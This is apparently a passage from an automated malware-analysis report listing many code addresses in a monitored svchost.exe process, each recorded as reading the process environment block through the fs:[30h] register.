Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]	1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]	1_2_031D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]	1_2_031D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]	1_2_0320634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]	1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]	1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]	1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]	1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]	1_2_031EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]	1_2_031B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]	1_2_031663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]	1_2_0312823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]	1_2_0312A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]	1_2_03136259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]	1_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]	1_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]	1_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]	1_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]	1_2_0312826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]	1_2_0320625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]	1_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]	1_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]	1_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]	1_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]	1_2_032062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]	1_2_031F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]	1_2_03160124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]	1_2_0312C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]	1_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]	1_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]	1_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]	1_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]	1_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]	1_2_03170185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]	1_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]	1_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]	1_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]	1_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]	1_2_032061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]	1_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]	1_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]	1_2_031601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]	1_2_031B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]	1_2_031C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]	1_2_0312A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]	1_2_0312C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]	1_2_03132050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]	1_2_031B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]	1_2_0315C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]	1_2_0313208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]	1_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]	1_2_031280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]	1_2_031C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]	1_2_031B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0312C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]	1_2_031720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0312A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]	1_2_031380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]	1_2_031B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]	1_2_03130710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]	1_2_03160710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]	1_2_0316C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]	1_2_031AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]	1_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]	1_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]	1_2_03130750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]	1_2_031BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]	1_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]	1_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]	1_2_031B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]	1_2_03138770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]	1_2_031D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]	1_2_031307AF
